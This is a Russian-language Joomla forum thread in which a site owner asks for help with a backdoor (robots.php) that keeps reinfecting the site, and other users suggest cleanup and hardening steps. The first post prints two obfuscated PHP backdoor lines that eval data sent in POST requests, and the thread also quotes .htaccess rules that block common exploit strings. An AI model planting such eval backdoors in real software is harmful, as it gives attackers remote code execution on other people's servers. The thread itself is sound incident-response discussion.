0 Пользователей и 1 Гость просматривают эту тему.
  • 29 Ответов
  • 2073 Просмотров
*

sabnok

  • Осваиваюсь на форуме
  • 128
  • 1
Вирус в корне сайта
« : 23.09.2015, 10:11:28 »
Кто то заливает вирус в корень сайта на Joomla 3.2, такого вида Robots.php - касперский его определяет как backdoor.php.
Этот вирус заливает в папки Joomla различные левые Php файлы с кодом примерно такими:
$qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['qb8d09c'])){eval(${$s20}['qb8d09c']);}?><?php

$sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['na0b0b6'])) {eval($s21(${$s20}['na0b0b6']));}?><?php

Также похожие строчки появились в некоторых своих php файлах Joomla.

Понятия не имею где искать дыру)

в апаче логе нашел такие строчки:

50.62.177.106 - - [20/Sep/2015:13:36:14 +0300] "POST /robots.php HTTP/1.0" 403 1518 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
45.59.31.193 - - [21/Sep/2015:12:08:29 +0300] "POST /robots.php HTTP/1.1" 200 28622 "-" "-"

Хостер отключил опасные функции PHP и включил онлайн антивирус на опасные запросы. Инфицированный сайт ничем не отличается по работе от обычного состояния. Чистил сайт но потом опять заражение повторилось.

Где копать?) плагины вроде все по удалял ненужные.
*

draff

  • Практически профи
  • 2779
  • 173
  • step by step
Re: Вирус в корне сайта
« Ответ #1 : 23.09.2015, 10:24:00 »
А обновить Joomla до 3.4.х ?
Удалю вирус с сайта. Тема в коммерческом разделе
Создам плагин , модуль под заказ для VirtueMart , JoomShopping
*

12mv

  • Завсегдатай
  • 526
  • 20
  • Гульсина
Re: Вирус в корне сайта
« Ответ #2 : 23.09.2015, 10:28:30 »
Попробуйте http://yandex.ru/promo/manul
*

12mv

  • Завсегдатай
  • 526
  • 20
  • Гульсина
Re: Вирус в корне сайта
« Ответ #3 : 23.09.2015, 10:31:10 »
А вот тема с аналогичным вирусом и решением http://searchengines.guru/showthread.php?t=879811
*

sabnok

  • Осваиваюсь на форуме
  • 128
  • 1
Re: Вирус в корне сайта
« Ответ #4 : 23.09.2015, 10:44:25 »
Проверил манулом, зараженных вообще не нашел, только подозрительных файлов насчитал очень много))
*

winstrool

  • Завсегдатай
  • 773
  • 42
  • Свободен для работы
Re: Вирус в корне сайта
« Ответ #5 : 23.09.2015, 10:49:16 »
Самое актуальное сканировать айболитом, а дальше комплексные меры по устранению и предотвращению, зная хостеров, по опыту работы... они мало что понимают какие именно отключать функции надо и для чего вообще это делается.
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

12mv

  • Завсегдатай
  • 526
  • 20
  • Гульсина
Re: Вирус в корне сайта
« Ответ #6 : 23.09.2015, 10:52:21 »
Вообще я делала так, качала все файлы сайта .т.е. всю папку www на комп, по коду находила в каких файлах сидит, чистила ручками, удаляла все появившиеся папки и файлы вирусы и нормально, сайт здоров.
*

sabnok

  • Осваиваюсь на форуме
  • 128
  • 1
Re: Вирус в корне сайта
« Ответ #7 : 23.09.2015, 10:54:13 »
удалял все зараженые файлы чистил потом опять гляжу в корне залит robots.php,  и опять файлы инфицировались
*

winstrool

  • Завсегдатай
  • 773
  • 42
  • Свободен для работы
Re: Вирус в корне сайта
« Ответ #8 : 23.09.2015, 10:54:41 »
Вообще я делала так, качала все файлы сайта .т.е. всю папку www на комп, по коду находила в каких файлах сидит, чистила ручками, удаляла все появившиеся папки и файлы вирусы и нормально, сайт здоров.

А как решали вопрос с корнем проблемы?

удалял все зараженые файлы чистил потом опять гляжу в корне залит robots.php,  и опять файлы инфицировались
В соседних темах достаточно рекомендаций, чтоб самостоятельно устранить проблему, если есть конечно опыт в программирование, если нет, то вам без специалиста не обойтись.
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

12mv

  • Завсегдатай
  • 526
  • 20
  • Гульсина
Re: Вирус в корне сайта
« Ответ #9 : 23.09.2015, 11:04:25 »
Ну значит что то пропустили. После удаления всего, повторного заражения не может быть.

Для начала рекомендую посмотреть тут информацию и полистать список уязвимых приложений https://docs.joomla.org/Category:Security_Checklist/ru

Воспользоваться инструментом https://support.google.com/webmasters/answer/6066468?vid=1-635785918471659665-4262239763&rd=2
*

12mv

  • Завсегдатай
  • 526
  • 20
  • Гульсина
Re: Вирус в корне сайта
« Ответ #10 : 23.09.2015, 11:11:30 »
А как решали вопрос с корнем проблемы?
В соседних темах достаточно рекомендаций, чтоб самостоятельно устранить проблему, если есть конечно опыт в программирование, если нет, то вам без специалиста не обойтись.

Проблемы у всех почти разные. В моём случае  заражено было 749 файлов.
Везде в ручную удаляла вредоносный код, удаляла подозрительные файлы. У меня были заражены .js
не помню точно мои пошаговые действия, но сделала я всё правильно, Яндекс после перепроверки прислал положительный ответ, сайт здоров.
 
Для сканирования пробовала сервис: http://antivirus-alarm.ru/  -  выводится  путь до всех  вирусных файлов.

Кстати подозревала дырки в widjetkit

И опять же, поработал по ftp, удалил доступ, нужно опять поработать, создал/удалил
« Последнее редактирование: 23.09.2015, 11:15:25 от 12mv »
*

wishlight

  • Профи
  • 3635
  • 223
  • skype aqaus.com
Re: Вирус в корне сайта
« Ответ #11 : 23.09.2015, 11:39:50 »
Удалять ftp при lfi rfi бесполезно )

local file inclusion
remote file inclusion

А еще много что интересного есть )

Айболит рулит конечно пока что только. Ну и компонент securitycheck очевидные уязвимости показывает.
*

12mv

  • Завсегдатай
  • 526
  • 20
  • Гульсина
Re: Вирус в корне сайта
« Ответ #12 : 23.09.2015, 12:46:34 »
В любом случае, ftp просто так не должен висеть, пароли нужно постоянно менять либо создавать доступ при необходимости.
*

SeBun

  • Практически профи
  • 3163
  • 193
  • @SeBun48
Re: Вирус в корне сайта
« Ответ #13 : 23.09.2015, 13:14:55 »
удалял все зараженые файлы чистил потом опять гляжу в корне залит robots.php,  и опять файлы инфицировались
Удаляли вы, скорее всего, последствия работы программы, а не сам код, создающий этот файл. Для того, что бы его обнаружить, ваших знаний явно недостаточно. Проверьте айболитом в режиме ssh, он много чего находит. Сервис от Яндекса, на мой взгляд, сыроват. Далее - обновите движок и все компоненты. Часто взлом происходит именно через компонент - в самой Joomla дырок почти нет. Ну и напоследок - вспомните, ставили на сайт что нибудь с варезника? Последний вариант - если денег нет на специалиста, а у вас опять проблемы - удалите вообще все файлы с хостинга, поменяйте все пароли, залейте новую Joomla, скачанную с Joomla.org и переносите данные со старого сайта, предварительно проверяя их (тексты останутся в базе данных, перенести останется папки с картинками и шаблон). А вот шаблон (а обычно в нем и размещают бэкдор) стоит проверить особо тщательно.
Оказываю услуги по Joomla | Миграция на Joomla 3.x | Сопровождение | IT-аутсорсинг
*

sabnok

  • Осваиваюсь на форуме
  • 128
  • 1
Re: Вирус в корне сайта
« Ответ #14 : 23.09.2015, 13:58:55 »
В очередной раз почистил по удалял лишние плагины и компоненты, попробую проверить айболитом, если будет опять заражение то поставлю новую Joomla и новый шаблон и подключу базу старую если получиться))
 ФТП у меня отключен в настройках джумлы и на хосте не создан аккаунт
 http://antivirus-alarm.ru/   этот сервис не находит ничего)
*

SeBun

  • Практически профи
  • 3163
  • 193
  • @SeBun48
Re: Вирус в корне сайта
« Ответ #15 : 23.09.2015, 14:08:10 »
Оказываю услуги по Joomla | Миграция на Joomla 3.x | Сопровождение | IT-аутсорсинг
*

sabnok

  • Осваиваюсь на форуме
  • 128
  • 1
Re: Вирус в корне сайта
« Ответ #16 : 23.09.2015, 14:53:55 »
Проверил айболитом, нашел много ложного по сути, и шифрованные данные base64 ----->

например (!$status){if($customURL=$this->input->get('returnurl','','string')){$customURL= base64_decode($customURL);}$url=!empty($customURL)? $customURL : 'index.php?op

или

…plate();}if($this->template){$input=JFactory::getApplication()->input;$fileName= base64_decode($input->get('file'));$client=JApplicationHelper::getClientInfo($t

На .htaccess чето ругается.

Кто разбирается в нем??)) есть какие то нарушения?


## Can be commented out if causes errors, see notes above.
Options +FollowSymLinks

## Mod_rewrite in use.

RewriteEngine On

## Begin - Rewrite rules to block out some common exploits.
# If you experience problems on your site block out the operations listed below
# This attempts to block the most common type of exploit `attempts` to Joomla!
#
# Block out any script trying to base64_encode data within the URL.
RewriteCond %{QUERY_STRING} base64_encode[^(]*\([^)]*\) [OR]
# Block out any script that includes a <script> tag in URL.
RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL.
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL.
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Return 403 Forbidden header and show the content of the root homepage
RewriteRule .* index.php [F]
#
## End - Rewrite rules to block out some common exploits.

## Begin - Custom redirects
#
# If you need to redirect some pages, or set a canonical non-www to
# www redirect (or vice versa), place that code here. Ensure those
# redirects use the correct RewriteRule syntax and the [R=301,L] flags.
#
## End - Custom redirects

##
# Uncomment following line if your webserver's URL
# is not directly related to physical file paths.
# Update Your Joomla! Directory (just / for root).
##

# RewriteBase /

## Begin - Joomla! core SEF Section.
#
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
#
# If the requested path and file is not /index.php and the request
# has not already been internally rewritten to the index.php script
RewriteCond %{REQUEST_URI} !^/index\.php
# and the request is for something within the component folder,
# or for the site root, or for an extensionless URL, or the
# requested URL ends with one of the listed extensions
RewriteCond %{REQUEST_URI} /component/|(/[^.]*|\.(php|html?|feed|pdf|vcf|raw))$ [NC]
# and the requested path and file doesn't directly match a physical file
RewriteCond %{REQUEST_FILENAME} !-f
# and the requested path and file doesn't directly match a physical folder
RewriteCond %{REQUEST_FILENAME} !-d
# internally rewrite the request to the index.php script
RewriteRule .* index.php [L]
#
*

SeBun

  • Практически профи
  • 3163
  • 193
  • @SeBun48
Re: Вирус в корне сайта
« Ответ #17 : 23.09.2015, 14:57:08 »
Ну, наверное вот на эту строчку ругается:
Код
RewriteCond %{QUERY_STRING} base64_encode[^(]*\([^)]*\) [OR]

так как там есть base64 ))
Оказываю услуги по Joomla | Миграция на Joomla 3.x | Сопровождение | IT-аутсорсинг
*

sabnok

  • Осваиваюсь на форуме
  • 128
  • 1
Re: Вирус в корне сайта
« Ответ #18 : 23.09.2015, 15:01:28 »

что значат эти строчки из апаче лога?

65.193.86.2 - - [23/Sep/2015:06:15:28 +0300] "POST /administrator/index.php HTTP/1.0" 303 282 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
65.193.86.2 - - [23/Sep/2015:06:15:29 +0300] "GET /administrator/index.php HTTP/1.0" 200 7281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
65.193.86.2 - - [23/Sep/2015:06:15:29 +0300] "GET /administrator/index.php HTTP/1.1" 200 7064 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"

IP подозрительные из США. думаеться это от тудова идет залив вируса в корень сайта

по поводу .htacsses надо что то там править или все норм?
*

resident82

  • Осваиваюсь на форуме
  • 25
  • 0
Re: Вирус в корне сайта
« Ответ #19 : 23.09.2015, 21:35:19 »
что значат эти строчки из апаче лога?

65.193.86.2 - - [23/Sep/2015:06:15:28 +0300] "POST /administrator/index.php HTTP/1.0" 303 282 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
65.193.86.2 - - [23/Sep/2015:06:15:29 +0300] "GET /administrator/index.php HTTP/1.0" 200 7281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
65.193.86.2 - - [23/Sep/2015:06:15:29 +0300] "GET /administrator/index.php HTTP/1.1" 200 7064 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"

IP подозрительные из США. думаеться это от тудова идет залив вируса в корень сайта

по поводу .htacsses надо что то там править или все норм?

htaccess вроде обычный стандартный.. в логах видно что свободно заходят в админку. я бы заблочил этот айпишник через htaccess + сменить логин/пароль на админку + запаролить папку админки с помощью htaccess. пароли естественно нормальные должны быть. ну и зачистить всякие левые и измененные файлы само собой.
« Последнее редактирование: 23.09.2015, 21:55:58 от resident82 »
*

sabnok

  • Осваиваюсь на форуме
  • 128
  • 1
Re: Вирус в корне сайта
« Ответ #20 : 24.09.2015, 07:24:23 »
Такс, поставил пароль на папку администратор на хостинге, теперь при входе в админку нужно ввести пароль дополнительный.
Сменил логин и пароль от админки
Добавил такие строчки в htaccess:

<Limit GET POST>
order allow,deny
deny from 65.193.86.2
deny from 72.81.248.66
allow from all
</Limit>
это должно заблокировать эти IP?

Что еще можно предпринять?)
« Последнее редактирование: 24.09.2015, 08:42:45 от sabnok »
*

SeBun

  • Практически профи
  • 3163
  • 193
  • @SeBun48
Re: Вирус в корне сайта
« Ответ #21 : 24.09.2015, 09:35:03 »
это должно заблокировать эти IP?
Что еще можно предпринять?)
Не вижу смысла блокировать IP, так как маршрутизацию легко подделать. Например, подключившись через прокси или банально через ТОР. Заблокируете один адрес - зайдут с другого. И что, все прокси-сервера переписывать? Тогда уж раздобудьте списки серверов и заранее забейте. Всего то несколько миллионов строк в .htaccess... ))

Что еще сделать... Можете добавить плагин скрытия админки, наподобие JSecure Lite. Так вы усложните брут пароля и отбросите множество программ, которые сканируют именно админку. А так же прописать в htaccess запрет на определенные урлы, запрет на папки и т.д. Где то тут выкладывали FAQ по настройке. Ну и еще раз пройтись по всем компонентам-модулям, убедиться, что все скачано с официальных достоверных источников и имеет последнюю версию.
« Последнее редактирование: 24.09.2015, 09:38:56 от SeBun »
Оказываю услуги по Joomla | Миграция на Joomla 3.x | Сопровождение | IT-аутсорсинг
*

12mv

  • Завсегдатай
  • 526
  • 20
  • Гульсина
Re: Вирус в корне сайта
« Ответ #22 : 24.09.2015, 11:43:54 »
А адрес админки нельзя сменить? Я вот на IPB движке так делаю, постоянно ломятся туда. На Joomla не пробовала.

Было бы ещё полезно, сделать вход в админку с одноразовым кодом, который приходит по SMS.
*

draff

  • Практически профи
  • 2779
  • 173
  • step by step
Re: Вирус в корне сайта
« Ответ #24 : 24.09.2015, 11:49:08 »
Поставить плагин Marco's SQL Injection - отсылает письма с логом атаки.
http://joomlaforum.ru/index.php/topic,195980.0.html
Удалю вирус с сайта. Тема в коммерческом разделе
Создам плагин , модуль под заказ для VirtueMart , JoomShopping
*

SeBun

  • Практически профи
  • 3163
  • 193
  • @SeBun48
Re: Вирус в корне сайта
« Ответ #25 : 24.09.2015, 12:08:41 »
А адрес админки нельзя сменить?
Есть два способа - авторизация через htpassword или (и) плагин скрытия, например, JSequre (Lite версия бесплатна). В первом случае будет запрашивать дополнительный пароль, во втором - выкидывать на главную или на специальную страницу. Можно и сменить адрес, но для этого придется лезть в ядро.
« Последнее редактирование: 24.09.2015, 12:11:56 от SeBun »
Оказываю услуги по Joomla | Миграция на Joomla 3.x | Сопровождение | IT-аутсорсинг
*

sabnok

  • Осваиваюсь на форуме
  • 128
  • 1
Re: Вирус в корне сайта
« Ответ #26 : 24.09.2015, 15:26:52 »
А я просто поставил пароль на папку administrator с помощью средств хостинга, и теперь при попытке входа в админку Joomla, вылазите дополнительная форма автоизации) такой метод надежен?) или хакер может сбросить его?

нашел такое в инете:

## Начало - Запрет на выполнение php-скриптов в корне сайта
<Filesmatch ".(php)$">
order deny,allow
deny from all
</Filesmatch>
<Filesmatch "^index.php">
order allow,deny
allow from all
</Filesmatch>
<Filesmatch "^index2.php">
order deny,allow
allow from all
</Filesmatch>
## Конец - Запрет на выполнение php-скриптов в корне сайта

посколько заливают в корнеь сайта php файл, то это сможет его заблокировать?
« Последнее редактирование: 24.09.2015, 15:54:42 от sabnok »
*

SeBun

  • Практически профи
  • 3163
  • 193
  • @SeBun48
Re: Вирус в корне сайта
« Ответ #27 : 24.09.2015, 23:07:44 »
если я получу доступ к корню, мне плевать на эти разрешения. Если я обнаружу, что залитый мной php не выполняется, я могу залить перловый скрипт или скачать index.php (либо взять из дистрибутива), дописать в него что нужно и залить обратно. Не занимайтесь ерундой.
Оказываю услуги по Joomla | Миграция на Joomla 3.x | Сопровождение | IT-аутсорсинг
*

sabnok

  • Осваиваюсь на форуме
  • 128
  • 1
Re: Вирус в корне сайта
« Ответ #28 : 27.09.2015, 08:46:13 »
Инфицирование вроде прекратилось, но происходят такие запросы в логе

94.23.77.182 - - [27/Sep/2015:03:41:49 +0300] "POST /media/dhl/info.php HTTP/1.1" 404 1740 "-" "Opera/9.80 (X11; Linux i686; U; ru) Presto/2.8.131 Version/11.10"

что он означает? Попытку залить файл, но не удачно??
*

vipiusss

  • Профи
  • 5652
  • 324
  • Злой я сегодня.Без обид.
Re: Вирус в корне сайта
« Ответ #29 : 27.09.2015, 08:53:20 »
значит не прекратилось.таких в медиа запросов не может быть
Миграция, установка, обновление версий Joomla  |  Создание сайтов "под ключ"  |  Эксклюзивные заглушки "offline"  |  Работа с "напильником" над шаблонами и расширениями
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

опять вирус \?

Автор mami_

Ответов: 15
Просмотров: 171
Последний ответ 07.09.2017, 06:20:29
от voland
Компоненты и скрипты для защиты сайта. Логи атак на сайты

Автор wishlight

Ответов: 589
Просмотров: 192175
Последний ответ 06.08.2017, 12:41:32
от winstrool
В корне сайта появляется файл с именем ".bt" (без ковычек)

Автор maestra

Ответов: 24
Просмотров: 2228
Последний ответ 26.07.2017, 12:09:01
от winstrool
Вирус, который виден только в кэше поисковых систем

Автор silavoli

Ответов: 12
Просмотров: 1168
Последний ответ 19.07.2017, 09:57:20
от flyingspook
Поймали вирус trojan.inject.21 как лечить

Автор nick2202

Ответов: 3
Просмотров: 397
Последний ответ 14.07.2017, 17:31:00
от voland